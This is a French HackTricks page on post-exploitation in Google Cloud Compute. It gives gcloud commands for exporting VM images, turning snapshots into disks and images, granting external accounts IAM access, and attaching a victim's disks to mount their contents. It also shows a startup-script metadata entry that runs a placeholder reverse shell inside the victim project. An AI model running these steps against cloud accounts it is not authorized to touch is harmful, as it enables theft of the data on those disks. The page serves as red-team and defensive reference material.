GCP - Compute Post Exploitation

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.

Compute

Pour plus d'informations sur Compute et VPC (Réseau), consultez :

Exporter et inspecter des images localement

Cela permettrait à un attaquant d'accéder aux données contenues dans des images existantes ou de créer de nouvelles images de VM en cours d'exécution et d'accéder à leurs données sans avoir accès à la VM en cours d'exécution.

Il est possible d'exporter une image de VM vers un bucket, puis de la télécharger et de la monter localement avec la commande :

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Avant de réaliser cette action, l'attaquant pourrait avoir besoin de privilèges sur le bucket de stockage et bien sûr de privilèges sur cloudbuild car c'est le service qui sera chargé d'effectuer l'export. De plus, pour que cela fonctionne, le SA de codebuild et le SA de compute ont besoin d'autorisations privilégiées. Le SA de cloudbuild <project-id>@cloudbuild.gserviceaccount.com a besoin de :

roles/iam.serviceAccountTokenCreator
roles/compute.admin
roles/iam.serviceAccountUser

Et le SA <project-id>-compute@developer.gserviceaccount.com a besoin de :

roles/compute.storageAdmin
roles/storage.objectAdmin

Exporter et inspecter des instantanés et des disques localement

Il n'est pas possible d'exporter directement des instantanés et des disques, mais il est possible de transformer un instantané en disque, un disque en une image et en suivant la section précédente, exporter cette image pour l'inspecter localement

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Inspecter une image en créant une VM

Dans le but d'accéder aux données stockées dans une image ou à l'intérieur d'une VM en cours d'exécution à partir de laquelle un attaquant a créé une image, il est possible d'accorder un accès à un compte externe sur l'image :

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

et ensuite créer une nouvelle VM à partir de celui-ci :

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

Si vous ne pouviez pas donner accès à votre compte externe sur l'image, vous pourriez lancer une VM en utilisant cette image dans le projet de la victime et faire exécuter les métadonnées un shell inversé pour accéder à l'image en ajoutant le paramètre :

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspecter un instantané/disque en le connectant à une VM

Dans le but d'accéder aux données stockées dans un disque ou un instantané, vous pourriez transformer l'instantané en disque, un disque en une image et suivre les étapes précédentes.

Ou vous pourriez accorder l'accès à un compte externe sur le disque (si le point de départ est un instantané, accordez l'accès à l'instantané ou créez un disque à partir de celui-ci) :

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Attacher le disque à une instance :

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Montez le disque à l'intérieur de la VM :

Connectez-vous en SSH à la VM :

gcloud compute ssh [NOM_INSTANCE] --zone [ZONE]

Identifiez le Disque : Une fois à l'intérieur de la VM, identifiez le nouveau disque en listant les périphériques de disque. Vous le trouverez généralement sous la forme /dev/sdb, /dev/sdc, etc.
Formatez et Montez le Disque (s'il s'agit d'un disque neuf ou brut) :

Créez un point de montage :

sudo mkdir -p /mnt/disks/[REP_MONTAGE]

Montez le disque :

sudo mount -o discard,defaults /dev/[DISPOSITIF_DISQUE] /mnt/disks/[REP_MONTAGE]

Si vous ne pouvez pas donner accès à un projet externe à l'instantané ou au disque, vous devrez peut-être effectuer ces actions à l'intérieur d'une instance du même projet que l'instantané/le disque.

PrécédentGCP - Cloud SQL Post Exploitation SuivantGCP - Filestore Post Exploitation

Dernière mise à jour il y a 1 mois